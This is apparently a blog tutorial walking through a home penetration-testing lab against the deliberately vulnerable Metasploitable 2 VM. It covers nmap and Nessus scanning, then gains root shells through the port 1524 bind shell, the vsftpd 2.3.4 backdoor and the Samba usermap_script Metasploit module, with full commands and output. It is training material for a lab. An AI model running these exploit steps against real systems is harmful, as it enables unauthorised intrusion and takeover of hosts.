Hello, and welcome to my guide on hacking Metasploitable 2. My name is Lunch Box, formerly known as shadowman64, and I will be your instructor today. What will you be learning today? Let's take a look-
-->Installing VMware
-->Installing Metasploitable2
--> Scanning The Target with Nmap
-->Vulnerability Scanning with Nessus
-->Exploiting the target with Metasploit
For this guide, I will be using BackTrack 5. I suggest you go download and install it at http://www.backtrack-linux.org/
Next, we will need a target computer (if you prefer to call this a "host, "box" or "machine", feel free to do so. :) )
Now here comes the obvious question- what if I don't have another computer to use as a target host? VMware.
----------------------------------------------------------------------------------------------
Installing VMware
VMware is a virtualization software product designed to run virtual hosts (their operating systems, to be specific). We will be using the free version of this software, VMware Player.
Navigate to this URL:
Code:
http://www.vmware.com/products/player/overview.htmlClick the blue "Download" button. You will be directed to a web page that has several files for this software. Since I am using 32-bit Linux, I downloaded my corresponding file (VMware-Player-5.0.0-812388.i386.bundle).
Once the file is downloaded, navigate to the directory you downloaded the file into. We need to make the file executable, so once you are in the correct directory, type-
Code:
chmod +x <filename.bundle>Then, type-
Code:
./filenameYou will then be guided through the installer. Now that we have VMware, let's move on to the operating system we will be using inside of it.
----------------------------------------------------------------------------------------------
Installing Metasploitable2
Metasploitable2 is the sequel to Metasploitable, an intentionally vulnerable operating system. With tons of vulnerable and misconfigured services plus a web server with several vulnerable web applications, this insecure Linux distribution is a must-have for any penetration testing lab, and a wonderful practice environment.
Navigate to
Code:
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/Download the .zip file. Navigate to the directory you downloaded it into in Terminal, just like we did with VMware. Then type-
Code:
unzip metasploitable-linux-2.0.0.zipNow that the file is unzipped, simply open up your File System Manager (for me it would be Dolphin) and simply double-click on the .vmx file, which will open right up in VMware.
For a realistic external host, use bridged networking, which you can find under Virtual Machine Settings. You can have a private little network with the target host by using Host-Only networking. I would explain networking in a little more detail, but if you are learning penetration testing you should have a good foundation of knowledge regarding networking (the OSI Model, TCP/IP, network topology, switches, hubs, etc.)
Now go ahead and fire up Metasploitable2 in VMWare. The operating system will load in the VMware window, and eventually you will be prompted with a login dialogue. Click inside the window to input data into VMware, and press Ctrl-Alt to get out of VMware and back to your actual user interface. Login with the default credentials (Username is msfadmin and Password is msfadmin). Once you are logged in, click Ctrl-Alt. We need not do anything else with Metasploitable2, as all of it's network services are listening for connections.
Firstly, let's figure out what the IP address of the target is. We could eventually figure this out simply by scanning the entire subnet mask for a block of 254 IP addresses (the size of the IP block depends on the IP Class, in this case, Class C) and then using OS fingerprinting and eventually service scanning. But let's just type "ifconfig" in VMware to find the address of our vulnerable box.
My target IP address is 192.168.0.18
Now let's get down to business. Open a Terminal window if you have not already.
----------------------------------------------------------------------------------------------
Gathering Information with Nmap
First, like I mentioned earlier, we can't hack anything if we have no targets. There are several tools to do this-
Code:
nmap -sn 192.168.0.18
Code:
ping 192.168.0.18
Code:
fping 192.168.0.18You get the point. Personally, if we are pinging a single host, I prefer fping. The output is simple and to the point. However, if we were scanning an entire subnet, I would definitely go with nmap-
Code:
nmap -sn 192.168.0.0/24This will scan the entire subnet for hosts that are simply alive, nothing more, nothing less. :)
So, judging from the output of whatever command you ran to determine whether the host is alive or not, it should be alive. If you have an issue sending or receiving packets over the network to the target, here are some tips to troubleshoot-
-->Make sure the target IP is correct.
-->If you are using a bridged adapter, the target host is going to replicate the physical connection to the network. Be sure you are still connected to the network.
Let's see what operating system the target is running by using the -O switch in nmap-
Code:
nmap -O 192.168.0.18Your output should look something like this-
Code:
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-10-04 01:16 EDT
Nmap scan report for 192.168.0.18
Host is up (0.00049s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:63:64:6C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.31
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.63 secondsOk, I dont know about you, but I'm pretty sure this host is running Linux. As you can see, there are many services running on this target.
We should get the actual version information for these services, and see exactly what is running on these open ports-
Code:
nmap -sV 192.168.0.18Your output should look something like so-
Code:
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-10-04 01:20 EDT
Nmap scan report for 192.168.0.18
Host is up (0.0014s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open ingreslock?
2049/tcp open rpcbind
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1So what do we know so far? Basically, we have a bunch of open ports with a bunch of services running on them. There are many more information gathering and finger/footprinting methods, but I will not go over them in detail here. There will eventually be a dedicated tutorial to information gathering at a later time. Nevertheless, lets move on to vulnerability scanning.
----------------------------------------------------------------------------------------------
Vulnerability Scanning with Nessus
To scan this host for vulnerabilities, I am going to use my favorite vulnerability scanner, Nessus. Nessus, in reality, is much more than just a vulnerability scanner. Rather, it can be thought of as a framework, with a ton of various plug-ins for different types of scanning. Nessus does not come installed by default in my OS, and even though I already have it, just for the sake of learning I will show you how to install it.
Go to
Code:
http://www.tenable.com/products/nessus/select-your-operating-systemAgree to the terms and conditions, and then choose the file that's right for your OS. I chose the 32-bit .deb file. Once downloaded, navigate to the directory you downloaded the file in and run dpkg-
Code:
dpkg -i <file>From there, the file will be depackaged. We can not run Nessus without the plug-ins, however. We must obtain an activation code to do this. Go To-
Code:
http://www.tenable.com/products/nessus/nessus-plugins/register-a-homefeedProvide your first and last name and a valid email address (this is the email address the activation code will be sent). Once you obtain the code, run the following command-
Code:
/opt/nessus/bin/nessus-fetch --register <activation code>where <activation code> is the code provided in your email to activate your plug-ins.
Then add a user-
Code:
/opt/nessus/sbin/nessus-adduserAfter running the above command, login with the username and password you desire for your user account in nessus.
Now we can start our nessus service-
Code:
/etc/init.d/nessusd startThis command will start the Nessus server. Wait a little bit, because all the plug-ins need to be loaded and the service will be starting at-
Code:
https://127.0.0.1:8834/Once the service is started and you navigate to the above URL in your web browser, log in with the credentials you provided when you created your user account.
Now we can run our new scan. Click on the "Scans" tab, then click the "Add" button. You will find a small menu to enter in all of your scan settings. Under "Name", I will put Metasploitable. Under Type I left it on the default option "Run Now". My Scan Policy was an "Internal Network Scan", and my Scan Targets was just one line- 192.168.0.18
As you can see, you could also provide a file with a list of hosts to scan. From here, we launch the scan and wait.
If you are wondering why we chose an Internal Network Scan as our policy, think about it for a second. We are not outside the network, we are inside it, hence the network connection. We are not hacking web applications (not yet), and we are not preparing for an audit. We want to internally scan the network because wwee are scanning the hosts inside, or on, the network, you see?
Did you also know you can edit your policies? For instance, we can change the settings of our policy "Internal Network Scan" by clicking the Policies tab and then double clicking "Internal Network Scan".
Now that our scan is finished, let's have a look at some of the vulnerabilities Nessus has discovered.
According to the scan report, we have 8 critical vulnerabilities. Let's take a look at one I find very interesting and quite disturbing, as it would be a fatal error on any network administrator's part.
----------------------------------------------------------------------------------------------
Exploitation
1--> wild_shell
Look for Plugin ID 51988 and click on it to read more about the vulnerability. Apparently there is a service named wild_shell running on port 1524/tcp of our host. The description is pretty self explanatory. We have a listening shell on our target system waiting for a remote connection from us. Let's try it-
Code:
netcat -vv 192.168.0.18 1524And that's all she wrote. We now have a remote command shell on the target with root privileges. Is that the only way to exploit this box? Hell no, let's look at some other ways.
2--> Smiley Face Backdoor
Now this one is interesting. The remote FTP server that is running on our target host was compiled with a backdoor. When attempting to login to the server with :) (a smiley face) as a username, the backdoor is triggered and listens for a connection on port 6200/tcp. After the client connects and then disconnects from the backdoor, the shell will stop listening for a connection.
Looking further into the Nessus output, we can see that this vulnerability is exploitable with Metasploit, particularly the VSFTPD v2.3.4 Backdoor Command Execution exploit. Let's run it-
Code:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.0.18
exploitHere is our output-
Code:
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.We were told to specify the password becaus we didn't actually give one, the exploit simply passes a smiley face [ :) ] to the FTP server as a username to trigger the backdoor. Now we need a TCP/IP tool like netcat to connect to our listening shell-
Code:
netcat -vv 192.168.0.18 6200Here is my output-
Code:
192.168.0.18: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.0.18] 6200 (?) openAnd there we are. We now have a remote shell on the server yet again, and with root priviliges. But I'm not nearly finished with Metasploitable 2, because we still have to exploit Samba. :)
3--> Samba MS-RPC Request Heap Overflow
From the output we read in Nessus, it seems as though the version of Samba installed on the remote host is affected by multiple heap overflow vulnerabilities. However, if you have ever played around with Metasploit and have pentested a Linux box, you probably have heard of the samba usermap script vulnerability. According to the information about the exploit, it affects versions 3.0.20 through 3.0.25rc3 of Samba. A quick nmap scan can tell us what version Metasploitable2 is running-
Code:
nmap -sV 192.168.0.18 -p 445Generally, usermap_script is not enabled by default in Samba. If you want to actually see the configuration of the Samba server, go into your Metasploitable virtual machine and type-
Code:
cd /etc/sambaFrom here type-
Code:
nano smb.confScroll down with your bottom arrow through the terminal window, and you will more than likely find this line of code-
Code:
username map script = /etc/samba/scripts/mapusers.shThis basically confirms our suspicions of Samba using usermap script, since there is a script provided as a value in the username map script variable.
Now we can run our exploit against it-
Code:
use exploit/multi/samba/usermap_script
set RHOST 192.168.0.18
set RPORT 445
exploitHere is the output-
Code:
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo UbncLf1kk7mNDQ5k;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "UbncLf1kk7mNDQ5k\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.0.9:4444 -> 192.168.0.18:58504) at 2012-10-04 18:21:30 -0400There you have it. Again, we have a root shell on the remote host.
Now, at this point you get the gist of gathering information, scanning the target for vulnerabilities, and exploiting it. And of course, judging from the output of your Nessus scan, there are still several other critical vulnerabilities as well, and of course the high level and medium level vulnerabilities. Of course, that's not all there is to Metasploitable2. There are still some web applications ready to hack, so stay tuned for Part 2 of this guide. :)
0 nhận xét:
Đăng nhận xét